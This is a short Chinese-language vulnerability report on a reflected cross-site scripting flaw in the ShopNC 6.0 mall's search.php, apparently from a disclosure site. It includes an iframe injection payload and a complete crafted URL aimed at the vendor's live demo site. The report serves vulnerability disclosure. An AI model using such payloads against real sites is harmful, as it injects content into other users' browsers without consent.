### 简要描述:
自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击.
目前最新版本 6.0 存在此问题!
### 详细说明:
Search.php页面 对search变量未进行严格过滤,
无论是否编码均执行用户url提交的脚本
比如,跨站脚本为
```
<iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>
```
如图
[<img src="https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg)
目前可以在官方演示站进行测试
http://mall.shopnc.net
```
http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0
```
### 漏洞证明:
都在详细说明中.
暂无评论